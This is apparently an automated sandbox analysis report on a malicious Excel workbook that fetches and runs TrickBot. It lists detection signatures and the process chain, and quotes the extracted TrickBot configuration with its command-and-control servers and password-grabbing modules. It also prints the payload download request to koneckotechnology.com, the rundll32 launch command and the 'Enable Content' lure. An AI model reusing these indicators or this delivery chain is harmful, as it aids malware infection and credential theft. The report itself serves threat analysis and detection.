Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Heur.32219.22782

Overview

General Information

Sample Name:SecuriteInfo.com.Heur.32219.22782 (renamed file extension from 22782 to xls)
Analysis ID:412857
MD5:1ce9bb4784ef70cd5d09291a5005ab51
SHA1:f4c3e4d7be3e6855c0272b0c2f3a2833bd6963a1
SHA256:dfae46a2c8083b6cf4f91691289ca97cbcc002126058a2900f09564edccffdfb
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 TrickBot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Trickbot
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 672 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2640 cmdline: rundll32 ..\hsdksksk.iem,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2676 cmdline: rundll32 ..\hsdksksk.iem,StartW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2320 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

Threatname: Trickbot

{"ver": "2000029", "gtag": "net15", "servs": ["103.66.72.217:443", "117.252.68.211:443", "103.124.173.35:443", "115.73.211.230:443", "117.54.250.246:443", "131.0.112.122:443", "69.109.35.254:20445", "43.17.158.63:36366", "130.180.24.227:44321", "131.168.228.35:19932", "185.31.222.247:49372", "151.187.13.249:46881", "190.186.36.209:40737", "42.139.161.213:11056", "23.95.165.4:64265", "189.169.15.32:42761", "125.6.227.80:58405", "217.159.190.123:8412", "47.106.66.231:10710", "46.136.156.92:5385"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Heur.32219.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x1675d:$e1: Enable Editing
  • 0x16495:$e3: Enable editing
  • 0x16572:$e4: Enable content

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
    00000004.00000002.2100567095.00000000002C0000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
      00000004.00000002.2100613239.00000000003A4000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
        00000004.00000002.2100649939.00000000003E1000.00000020.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.rundll32.exe.3e0000.2.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
            4.2.rundll32.exe.2c052e.1.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
              4.2.rundll32.exe.2c052e.1.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\hsdksksk.iem,StartW, CommandLine: rundll32 ..\hsdksksk.iem,StartW, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 672, ProcessCommandLine: rundll32 ..\hsdksksk.iem,StartW, ProcessId: 2640

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmpMalware Configuration Extractor: Trickbot {"ver": "2000029", "gtag": "net15", "servs": ["103.66.72.217:443", "117.252.68.211:443", "103.124.173.35:443", "115.73.211.230:443", "117.54.250.246:443", "131.0.112.122:443", "69.109.35.254:20445", "43.17.158.63:36366", "130.180.24.227:44321", "131.168.228.35:19932", "185.31.222.247:49372", "151.187.13.249:46881", "190.186.36.209:40737", "42.139.161.213:11056", "23.95.165.4:64265", "189.169.15.32:42761", "125.6.227.80:58405", "217.159.190.123:8412", "47.106.66.231:10710", "46.136.156.92:5385"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dllReversingLabs: Detection: 12%
                Source: C:\Users\user\hsdksksk.iemReversingLabs: Detection: 12%
                Multi AV Scanner detection for submitted fileShow sources
                Source: SecuriteInfo.com.Heur.32219.xlsVirustotal: Detection: 8%Perma Link
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb\A source: hsdksksk.iem.0.dr
                Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb source: hsdksksk.iem.0.dr

                Software Vulnerabilities:

                barindex
                Document exploit detected (creates forbidden files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dllJump to behavior
                Document exploit detected (drops PE files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: netmons[1].dll.0.drJump to dropped file
                Document exploit detected (UrlDownloadToFile)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
                Source: global trafficDNS query: name: koneckotechnology.com
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.54.114.131:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.54.114.131:80
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 12 May 2021 23:49:19 GMTserver: Apachelast-modified: Wed, 12 May 2021 13:22:52 GMTaccept-ranges: bytescontent-length: 643072content-type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 5d 9f e5 23 3c f1 b6 23 3c f1 b6 23 3c f1 b6 a0 34 ae b6 29 3c f1 b6 d9 1f e8 b6 25 3c f1 b6 30 34 ac b6 21 3c f1 b6 26 30 fe b6 38 3c f1 b6 26 30 ae b6 a9 3c f1 b6 23 3c f0 b6 62 3e f1 b6 a0 34 ac b6 30 3c f1 b6 26 30 91 b6 57 3c f1 b6 26 30 ad b6 22 3c f1 b6 cf 37 af b6 22 3c f1 b6 26 30 ab b6 22 3c f1 b6 52 69 63 68 23 3c f1 b6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c1 ab 9b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 07 0a 00 80 02 00 00 40 07 00 00 00 00 00 9a f2 00 00 00 10 00 00 00 90 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 3e 03 00 45 00 00 00 5c 21 03 00 04 01 00 00 00 a0 03 00 7c cf 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 09 00 80 34 00 00 a0 95 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e6 02 00 48 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 94 05 00 00 d4 20 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 78 02 00 00 10 00 00 00 80 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 55 ae 00 00 00 90 02 00 00 b0 00 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 59 00 00 00 40 03 00 00 30 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c cf 05 00 00 a0 03 00 00 d0 05 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 04 81 00 00 00 70 09 00 00 90 00 00 00 40 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: Joe Sandbox ViewIP Address: 198.54.114.131 198.54.114.131
                Source: global trafficHTTP traffic detected: GET /netmons.dll HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: koneckotechnology.comConnection: Keep-Alive
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70BA6ED2.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /netmons.dll HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: koneckotechnology.comConnection: Keep-Alive
                Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: unknownDNS traffic detected: queries for: koneckotechnology.com
                Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: rundll32.exe, 00000003.00000002.2101849521.0000000001E37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2101059002.0000000002057000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

                System Summary:

                barindex
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 4Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 8Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 12Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 12Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 16Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 16Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 20Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 20Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 24Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 24Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 28Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 28Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 32Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 32Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 36Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 36Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 40Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 40Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 44Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 44Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 48Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 48Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 52Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 52Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 56Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 56Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 60Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 60Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 64Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 64Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 68Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 68Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 72Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 72Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 76Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 76Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 80Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 80Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 84Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 84Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 88Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 88Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 92Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 92Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 96Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 96Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 100Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 100Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 104Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 104Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 108Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 108Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 112Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 112Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 116Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 116Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 120Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 120Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 124Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 124Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 128Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 128Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 132Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 132Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 136Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 136Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 140Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 140Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 144Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 144Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: SecuriteInfo.com.Heur.32219.xlsInitial sample: EXEC
                Office process drops PE fileShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\hsdksksk.iemJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dllJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                Source: SecuriteInfo.com.Heur.32219.xlsOLE indicator, VBA macros: true
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll 697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D
                Source: Joe Sandbox ViewDropped File: C:\Users\user\hsdksksk.iem 697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D
                Source: SecuriteInfo.com.Heur.32219.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
                Source: rundll32.exe, 00000003.00000002.2101618161.0000000001C50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2100870975.0000000001E70000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@7/7@1/1
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD6FD.tmpJump to behavior
                Source: SecuriteInfo.com.Heur.32219.xlsOLE indicator, Workbook stream: true
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
                Source: SecuriteInfo.com.Heur.32219.xlsVirustotal: Detection: 8%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
